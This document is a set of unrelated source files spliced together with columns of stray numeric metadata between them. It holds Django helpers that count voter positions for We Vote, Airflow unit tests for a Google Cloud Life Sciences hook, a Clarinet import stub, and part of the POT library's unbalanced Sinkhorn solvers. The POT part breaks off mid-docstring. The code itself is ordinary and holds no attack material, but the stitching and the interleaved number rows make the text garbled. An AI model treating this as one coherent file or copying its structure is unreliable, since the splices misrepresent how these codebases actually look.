count_result = None
try:
count_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(google_civic_election_id):
count_query = count_query.filter(google_civic_election_id=google_civic_election_id)
if positions_taken_by_these_voter_we_vote_ids is not False:
count_query = count_query.filter(voter_we_vote_id__in=positions_taken_by_these_voter_we_vote_ids)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_positions_public_with_comments(self, google_civic_election_id=0,
positions_taken_by_these_voter_we_vote_ids=False):
count_result = None
try:
count_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(google_civic_election_id):
count_query = count_query.filter(google_civic_election_id=google_civic_election_id)
count_query = count_query.exclude(
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
if positions_taken_by_these_voter_we_vote_ids is not False:
count_query = count_query.filter(voter_we_vote_id__in=positions_taken_by_these_voter_we_vote_ids)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_positions_friends_only(self, google_civic_election_id=0,
positions_taken_by_these_voter_we_vote_ids=False):
count_result = None
try:
count_query = PositionForFriends.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(google_civic_election_id):
count_query = count_query.filter(google_civic_election_id=google_civic_election_id)
if positions_taken_by_these_voter_we_vote_ids is not False:
count_query = count_query.filter(voter_we_vote_id__in=positions_taken_by_these_voter_we_vote_ids)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_positions_friends_only_with_comments(self, google_civic_election_id=0,
positions_taken_by_these_voter_we_vote_ids=False):
count_result = None
try:
count_query = PositionForFriends.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(google_civic_election_id):
count_query = count_query.filter(google_civic_election_id=google_civic_election_id)
count_query = count_query.exclude(
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
if positions_taken_by_these_voter_we_vote_ids is not False:
count_query = count_query.filter(voter_we_vote_id__in=positions_taken_by_these_voter_we_vote_ids)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_voter_comments_entered_friends_only(self, voter_we_vote_id):
count_result = None
try:
count_query = PositionForFriends.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
count_query = count_query.filter(voter_we_vote_id__iexact=voter_we_vote_id)
count_query = count_query.exclude(
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_voter_comments_entered_public(self, voter_we_vote_id):
count_result = None
try:
count_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
count_query = count_query.filter(voter_we_vote_id__iexact=voter_we_vote_id)
count_query = count_query.exclude(
(Q(statement_text__isnull=True) | Q(statement_text__exact=''))
# Not working with statement_html yet
# &
# (Q(statement_html__isnull=True) | Q(statement_html__exact=''))
)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_voter_positions_entered_friends_only(self, voter_we_vote_id):
count_result = None
try:
count_query = PositionForFriends.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
count_query = count_query.filter(voter_we_vote_id__iexact=voter_we_vote_id)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_voter_positions_entered_public(self, voter_we_vote_id):
count_result = None
try:
count_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
count_query = count_query.exclude(stance__iexact=PERCENT_RATING)
count_query = count_query.filter(voter_we_vote_id__iexact=voter_we_vote_id)
count_result = count_query.count()
except Exception as e:
pass
return count_result
def fetch_positions_count_for_this_voter(self, voter):
position_filters = []
final_position_filters = []
if positive_value_exists(voter.we_vote_id):
new_position_filter = Q(voter_we_vote_id__iexact=voter.we_vote_id)
position_filters.append(new_position_filter)
if positive_value_exists(voter.id):
new_position_filter = Q(voter_id=voter.id)
position_filters.append(new_position_filter)
if positive_value_exists(voter.linked_organization_we_vote_id):
new_position_filter = Q(organization_we_vote_id=voter.linked_organization_we_vote_id)
position_filters.append(new_position_filter)
if len(position_filters):
final_position_filters = position_filters.pop()
# ...and "OR" the remaining items in the list
for item in position_filters:
final_position_filters |= item
# PositionEntered
position_list_query = PositionEntered.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
position_list_query = position_list_query.filter(final_position_filters)
position_entered_count = position_list_query.count()
# PositionForFriends
position_list_query = PositionForFriends.objects.using('readonly').all()
# As of Aug 2018 we are no longer using PERCENT_RATING
position_list_query = position_list_query.exclude(stance__iexact=PERCENT_RATING)
position_list_query = position_list_query.filter(final_position_filters)
position_for_friends_count = position_list_query.count()
total_positions_count = position_entered_count + position_for_friends_count
return total_positions_count
| 55.572401
| 120
| 0.624001
| 48,014
| 432,520
| 5.152705
| 0.016724
| 0.043945
| 0.055747
| 0.018496
| 0.908533
| 0.875264
| 0.847835
| 0.822398
| 0.796768
| 0.769153
| 0
| 0.002753
| 0.327245
| 432,520
| 7,782
| 121
| 55.579543
| 0.847484
| 0.149808
| 0
| 0.755487
| 0
| 0
| 0.062211
| 0.033974
| 0
| 0
| 0
| 0.000771
| 0
| 1
| 0.024843
| false
| 0.006976
| 0.003403
| 0.002382
| 0.098179
| 0.000681
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
40b7905c97fae8d2331c8b2a03ef918d3c374c94
| 13,095
|
py
|
Python
|
tests/providers/google/cloud/hooks/test_life_sciences.py
|
troywinter/airflow
|
ba66ba0d97941c55d9f00f66329a9d3c7ad673e7
|
[
"Apache-2.0"
] | 3
|
2015-08-25T13:56:44.000Z
|
2020-03-21T10:26:58.000Z
|
tests/providers/google/cloud/hooks/test_life_sciences.py
|
troywinter/airflow
|
ba66ba0d97941c55d9f00f66329a9d3c7ad673e7
|
[
"Apache-2.0"
] | 37
|
2020-07-21T07:50:02.000Z
|
2022-03-29T22:31:28.000Z
|
tests/providers/google/cloud/hooks/test_life_sciences.py
|
vuppalli/airflow
|
dfe8337ca2d3ed173d9ecc112938271519792c40
|
[
"Apache-2.0"
] | 4
|
2020-07-17T14:02:28.000Z
|
2022-02-23T04:29:58.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
Tests for Google Cloud Life Sciences Hook
"""
import unittest
from unittest import mock
from mock import PropertyMock
from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.life_sciences import LifeSciencesHook
from tests.providers.google.cloud.utils.base_gcp_mock import (
GCP_PROJECT_ID_HOOK_UNIT_TEST, mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
TEST_OPERATION = {"name": 'operation-name', "metadata": {"@type": 'anytype'},
"done": True, "response": "response"}
TEST_WAITING_OPERATION = {"done": False, "response": "response"}
TEST_DONE_OPERATION = {"done": True, "response": "response"}
TEST_ERROR_OPERATION = {"done": True, "response": "response", "error": "error"}
TEST_PROJECT_ID = "life-science-project-id"
TEST_LOCATION = 'test-location'
class TestLifeSciencesHookWithPassedProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__",
new=mock_base_gcp_hook_default_project_id,
):
self.hook = LifeSciencesHook(gcp_conn_id="test")
def test_location_path(self):
path = 'projects/life-science-project-id/locations/test-location'
path2 = self.hook._location_path(project_id=TEST_PROJECT_ID,
location=TEST_LOCATION)
self.assertEqual(path, path2)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.build")
def test_life_science_client_creation(self, mock_build, mock_authorize):
result = self.hook.get_conn()
mock_build.assert_called_once_with(
'lifesciences', 'v2beta', http=mock_authorize.return_value, cache_discovery=False
)
self.assertEqual(mock_build.return_value, result)
self.assertEqual(self.hook._conn, result)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
def test_run_pipeline_immediately_complete(self, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute.return_value = TEST_DONE_OPERATION
result = self.hook.run_pipeline(body={},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID)
parent = self.hook._location_path(project_id=TEST_PROJECT_ID,
location=TEST_LOCATION)
service_mock.projects.return_value.locations.return_value\
.pipelines.return_value.run \
.assert_called_once_with(body={},
parent=parent)
self.assertEqual(result, TEST_OPERATION)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.time.sleep")
def test_waiting_operation(self, _, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
execute_mock = mock.Mock(
**{"side_effect": [TEST_WAITING_OPERATION, TEST_DONE_OPERATION]}
)
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute = execute_mock
result = self.hook.run_pipeline(body={},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID)
self.assertEqual(result, TEST_OPERATION)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.time.sleep")
def test_error_operation(self, _, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
execute_mock = mock.Mock(**{"side_effect": [TEST_WAITING_OPERATION, TEST_ERROR_OPERATION]})
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute = execute_mock
with self.assertRaisesRegex(AirflowException, "error"):
self.hook.run_pipeline(body={},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID
)
class TestLifeSciencesHookWithDefaultProjectIdFromConnection(unittest.TestCase):
def setUp(self):
with mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__",
new=mock_base_gcp_hook_default_project_id,
):
self.hook = LifeSciencesHook(gcp_conn_id="test")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.build")
def test_life_science_client_creation(self, mock_build, mock_authorize):
result = self.hook.get_conn()
mock_build.assert_called_once_with(
'lifesciences', 'v2beta', http=mock_authorize.return_value, cache_discovery=False
)
self.assertEqual(mock_build.return_value, result)
self.assertEqual(self.hook._conn, result)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
def test_run_pipeline_immediately_complete(self, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute.return_value = TEST_DONE_OPERATION
result = self.hook.run_pipeline(body={}, # pylint: disable=no-value-for-parameter
location=TEST_LOCATION)
parent = self.hook.\
_location_path(location=TEST_LOCATION) # pylint: disable=no-value-for-parameter
service_mock.projects.return_value.locations.return_value\
.pipelines.return_value.run \
.assert_called_once_with(body={},
parent=parent)
self.assertEqual(result, TEST_OPERATION)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.time.sleep")
def test_waiting_operation(self, _, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
execute_mock = mock.Mock(
**{"side_effect": [TEST_WAITING_OPERATION, TEST_DONE_OPERATION]}
)
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute = execute_mock
result = self.hook.run_pipeline(body={}, # pylint: disable=no-value-for-parameter
location=TEST_LOCATION)
self.assertEqual(result, TEST_OPERATION)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=GCP_PROJECT_ID_HOOK_UNIT_TEST
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.time.sleep")
def test_error_operation(self, _, get_conn_mock, mock_project_id):
service_mock = get_conn_mock.return_value
service_mock.projects.return_value \
.locations.return_value \
.pipelines.return_value \
.run.return_value \
.execute.return_value = TEST_OPERATION
execute_mock = mock.Mock(**{"side_effect": [TEST_WAITING_OPERATION, TEST_ERROR_OPERATION]})
service_mock.projects.return_value \
.locations.return_value \
.operations.return_value \
.get.return_value \
.execute = execute_mock
with self.assertRaisesRegex(AirflowException, "error"):
self.hook.run_pipeline(body={}, # pylint: disable=no-value-for-parameter
location=TEST_LOCATION)
class TestLifeSciencesHookWithoutProjectId(unittest.TestCase):
def setUp(self):
with mock.patch(
"airflow.providers.google.common.hooks.base_google.GoogleBaseHook.__init__",
new=mock_base_gcp_hook_no_default_project_id,
):
self.hook = LifeSciencesHook(gcp_conn_id="test")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook._authorize")
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.build")
def test_life_science_client_creation(self, mock_build, mock_authorize):
result = self.hook.get_conn()
mock_build.assert_called_once_with(
'lifesciences', 'v2beta', http=mock_authorize.return_value, cache_discovery=False
)
self.assertEqual(mock_build.return_value, result)
self.assertEqual(self.hook._conn, result)
@mock.patch(
'airflow.providers.google.common.hooks.base_google.GoogleBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.life_sciences.LifeSciencesHook.get_conn")
def test_run_pipeline(self, get_conn_mock, mock_project_id): # pylint: disable=unused-argument
with self.assertRaises(AirflowException) as e:
self.hook.run_pipeline(body={}, # pylint: disable=no-value-for-parameter
location=TEST_LOCATION)
self.assertEqual(
"The project id must be passed either as keyword project_id parameter or as project_id extra in "
"GCP connection definition. Both are not set!",
str(e.exception),
)
| 43.360927
| 109
| 0.675296
| 1,472
| 13,095
| 5.703804
| 0.122962
| 0.106122
| 0.073368
| 0.080395
| 0.828013
| 0.810743
| 0.806932
| 0.791806
| 0.787637
| 0.787637
| 0
| 0.000897
| 0.233753
| 13,095
| 301
| 110
| 43.504983
| 0.835858
| 0.078045
| 0
| 0.794118
| 0
| 0
| 0.199369
| 0.166155
| 0
| 0
| 0
| 0
| 0.084034
| 1
| 0.058824
| false
| 0.008403
| 0.02521
| 0
| 0.096639
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9056e10239503d586bb1393e2f0d3b03bd228bdf
| 133
|
py
|
Python
|
Clarinet/melodyextraction/skyline/__init__.py
|
rohans0509/Clarinet
|
0a7a6a5e6a91f93956b6b5739cab1f030655cac8
|
[
"MIT"
] | 1
|
2022-01-28T20:30:07.000Z
|
2022-01-28T20:30:07.000Z
|
Clarinet/melodyextraction/skyline/__init__.py
|
rohans0509/Clarinet
|
0a7a6a5e6a91f93956b6b5739cab1f030655cac8
|
[
"MIT"
] | null | null | null |
Clarinet/melodyextraction/skyline/__init__.py
|
rohans0509/Clarinet
|
0a7a6a5e6a91f93956b6b5739cab1f030655cac8
|
[
"MIT"
] | 2
|
2021-11-23T13:55:10.000Z
|
2021-11-23T13:56:57.000Z
|
from Clarinet.melodyextraction.skyline.skyline import skyline
from Clarinet.melodyextraction.skyline.modified_skyline import mskyline
| 66.5
| 71
| 0.902256
| 15
| 133
| 7.933333
| 0.466667
| 0.201681
| 0.470588
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052632
| 133
| 2
| 71
| 66.5
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
90c920c1f356338678847bf7303e1dd3b830159a
| 43,813
|
py
|
Python
|
ot/unbalanced.py
|
cshjin/POT
|
eccb1386eea52b94b82456d126bd20cbe3198e05
|
[
"MIT"
] | 624
|
2016-11-04T13:02:35.000Z
|
2020-04-16T10:27:14.000Z
|
ot/unbalanced.py
|
cshjin/POT
|
eccb1386eea52b94b82456d126bd20cbe3198e05
|
[
"MIT"
] | 112
|
2016-12-02T09:01:49.000Z
|
2020-04-07T09:31:25.000Z
|
ot/unbalanced.py
|
lchapel/POT
|
8385b6db7a394ed48a0eff630f852a6d3952db65
|
[
"MIT"
] | 163
|
2016-10-28T16:19:57.000Z
|
2020-04-15T13:39:23.000Z
|
# -*- coding: utf-8 -*-
"""
Regularized Unbalanced OT solvers
"""
# Author: Hicham Janati <hicham.janati@inria.fr>
# Laetitia Chapel <laetitia.chapel@univ-ubs.fr>
# License: MIT License
from __future__ import division
import warnings
from .backend import get_backend
from .utils import list_to_array
# from .utils import unif, dist
def sinkhorn_unbalanced(a, b, M, reg, reg_m, method='sinkhorn', numItermax=1000,
stopThr=1e-6, verbose=False, log=False, **kwargs):
r"""
Solve the unbalanced entropic regularization optimal transport problem
and return the OT plan
The function solves the following optimization problem:
.. math::
W = \min_\gamma \ \langle \gamma, \mathbf{M} \rangle_F + \mathrm{reg}\cdot\Omega(\gamma) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma \geq 0
where :
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\Omega` is the entropic regularization term, :math:`\Omega(\gamma)=\sum_{i,j} \gamma_{i,j}\log(\gamma_{i,j})`
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target unbalanced distributions
- KL is the Kullback-Leibler divergence
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10, 25] <references-sinkhorn-unbalanced>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,) or array-like (dim_b, n_hists)
One or multiple unnormalized histograms of dimension `dim_b`.
If many, compute all the OT distances :math:`(\mathbf{a}, \mathbf{b}_i)_i`
M : array-like (dim_a, dim_b)
loss matrix
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
method : str
method used for the solver either 'sinkhorn', 'sinkhorn_stabilized' or
'sinkhorn_reg_scaling', see those function for specific parameters
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (>0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
if n_hists == 1:
- gamma : (dim_a, dim_b) array-like
Optimal transportation matrix for the given parameters
- log : dict
log dictionary returned only if `log` is `True`
else:
- ot_distance : (n_hists,) array-like
the OT distance between :math:`\mathbf{a}` and each of the histograms :math:`\mathbf{b}_i`
- log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> a=[.5, .5]
>>> b=[.5, .5]
>>> M=[[0., 1.], [1., 0.]]
>>> ot.sinkhorn_unbalanced(a, b, M, 1, 1)
array([[0.51122823, 0.18807035],
[0.18807035, 0.51122823]])
.. _references-sinkhorn-unbalanced:
References
----------
.. [2] M. Cuturi, Sinkhorn Distances : Lightspeed Computation of Optimal
Transport, Advances in Neural Information Processing Systems
(NIPS) 26, 2013
.. [9] Schmitzer, B. (2016). Stabilized Sparse Scaling Algorithms for
Entropy Regularized Transport Problems. arXiv preprint arXiv:1610.06519.
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprint
arXiv:1607.05816.
.. [25] Frogner C., Zhang C., Mobahi H., Araya-Polo M., Poggio T. :
Learning with a Wasserstein Loss, Advances in Neural Information
Processing Systems (NIPS) 2015
See Also
--------
ot.unbalanced.sinkhorn_knopp_unbalanced : Unbalanced Classic Sinkhorn :ref:`[10] <references-sinkhorn-unbalanced>`
ot.unbalanced.sinkhorn_stabilized_unbalanced:
Unbalanced Stabilized sinkhorn :ref:`[9, 10] <references-sinkhorn-unbalanced>`
ot.unbalanced.sinkhorn_reg_scaling_unbalanced:
Unbalanced Sinkhorn with epslilon scaling :ref:`[9, 10] <references-sinkhorn-unbalanced>`
"""
if method.lower() == 'sinkhorn':
return sinkhorn_knopp_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
elif method.lower() == 'sinkhorn_stabilized':
return sinkhorn_stabilized_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr,
verbose=verbose,
log=log, **kwargs)
elif method.lower() in ['sinkhorn_reg_scaling']:
warnings.warn('Method not implemented yet. Using classic Sinkhorn Knopp')
return sinkhorn_knopp_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
else:
raise ValueError("Unknown method '%s'." % method)
def sinkhorn_unbalanced2(a, b, M, reg, reg_m, method='sinkhorn',
numItermax=1000, stopThr=1e-6, verbose=False,
log=False, **kwargs):
r"""
Solve the entropic regularization unbalanced optimal transport problem and
return the loss
The function solves the following optimization problem:
.. math::
W = \min_\gamma \quad \langle \gamma, \mathbf{M} \rangle_F + \mathrm{reg}\cdot\Omega(\gamma) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma\geq 0
where :
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\Omega` is the entropic regularization term, :math:`\Omega(\gamma)=\sum_{i,j} \gamma_{i,j}\log(\gamma_{i,j})`
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target unbalanced distributions
- KL is the Kullback-Leibler divergence
The algorithm used for solving the problem is the generalized
Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10, 25] <references-sinkhorn-unbalanced2>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,) or array-like (dim_b, n_hists)
One or multiple unnormalized histograms of dimension `dim_b`.
If many, compute all the OT distances :math:`(\mathbf{a}, \mathbf{b}_i)_i`
M : array-like (dim_a, dim_b)
loss matrix
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
method : str
method used for the solver either 'sinkhorn', 'sinkhorn_stabilized' or
'sinkhorn_reg_scaling', see those function for specific parameters
numItermax : int, optional
Max number of iterations
stopThr : float, optional
Stop threshold on error (>0)
verbose : bool, optional
Print information along iterations
log : bool, optional
record log if True
Returns
-------
ot_distance : (n_hists,) array-like
the OT distance between :math:`\mathbf{a}` and each of the histograms :math:`\mathbf{b}_i`
log : dict
log dictionary returned only if `log` is `True`
Examples
--------
>>> import ot
>>> a=[.5, .10]
>>> b=[.5, .5]
>>> M=[[0., 1.],[1., 0.]]
>>> ot.unbalanced.sinkhorn_unbalanced2(a, b, M, 1., 1.)
array([0.31912866])
.. _references-sinkhorn-unbalanced2:
References
----------
.. [2] M. Cuturi, Sinkhorn Distances : Lightspeed Computation of Optimal
Transport, Advances in Neural Information Processing Systems
(NIPS) 26, 2013
.. [9] Schmitzer, B. (2016). Stabilized Sparse Scaling Algorithms for
Entropy Regularized Transport Problems. arXiv preprint arXiv:1610.06519.
.. [10] Chizat, L., Peyré, G., Schmitzer, B., & Vialard, F. X. (2016).
Scaling algorithms for unbalanced transport problems. arXiv preprint
arXiv:1607.05816.
.. [25] Frogner C., Zhang C., Mobahi H., Araya-Polo M., Poggio T. :
Learning with a Wasserstein Loss, Advances in Neural Information
Processing Systems (NIPS) 2015
See Also
--------
ot.unbalanced.sinkhorn_knopp : Unbalanced Classic Sinkhorn :ref:`[10] <references-sinkhorn-unbalanced2>`
ot.unbalanced.sinkhorn_stabilized: Unbalanced Stabilized sinkhorn :ref:`[9, 10] <references-sinkhorn-unbalanced2>`
ot.unbalanced.sinkhorn_reg_scaling: Unbalanced Sinkhorn with epslilon scaling :ref:`[9, 10] <references-sinkhorn-unbalanced2>`
"""
b = list_to_array(b)
if len(b.shape) < 2:
b = b[:, None]
if method.lower() == 'sinkhorn':
return sinkhorn_knopp_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
elif method.lower() == 'sinkhorn_stabilized':
return sinkhorn_stabilized_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr,
verbose=verbose,
log=log, **kwargs)
elif method.lower() in ['sinkhorn_reg_scaling']:
warnings.warn('Method not implemented yet. Using classic Sinkhorn Knopp')
return sinkhorn_knopp_unbalanced(a, b, M, reg, reg_m,
numItermax=numItermax,
stopThr=stopThr, verbose=verbose,
log=log, **kwargs)
else:
raise ValueError('Unknown method %s.' % method)
def sinkhorn_knopp_unbalanced(a, b, M, reg, reg_m, numItermax=1000,
stopThr=1e-6, verbose=False, log=False, **kwargs):
r"""
Solve the entropic regularization unbalanced optimal transport problem and return the loss
The function solves the following optimization problem:
.. math::
W = \min_\gamma \quad \langle \gamma, \mathbf{M} \rangle_F + \mathrm{reg}\cdot\Omega(\gamma) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma \mathbf{1}, \mathbf{a}) +
\mathrm{reg_m} \cdot \mathrm{KL}(\gamma^T \mathbf{1}, \mathbf{b})
s.t.
\gamma \geq 0
where :
- :math:`\mathbf{M}` is the (`dim_a`, `dim_b`) metric cost matrix
- :math:`\Omega` is the entropic regularization term, :math:`\Omega(\gamma)=\sum_{i,j} \gamma_{i,j}\log(\gamma_{i,j})`
- :math:`\mathbf{a}` and :math:`\mathbf{b}` are source and target unbalanced distributions
- KL is the Kullback-Leibler divergence
The algorithm used for solving the problem is the generalized Sinkhorn-Knopp matrix scaling algorithm as proposed in :ref:`[10, 25] <references-sinkhorn-knopp-unbalanced>`
Parameters
----------
a : array-like (dim_a,)
Unnormalized histogram of dimension `dim_a`
b : array-like (dim_b,) or array-like (dim_b, n_hists)
One or multiple unnormalized histograms of dimension `dim_b`
If many, compute all the OT distances (a, b_i)
M : array-like (dim_a, dim_b)
loss matrix
reg : float
Entropy regularization term > 0
reg_m: float
Marginal relaxation term > 0
numItermax : int, optional
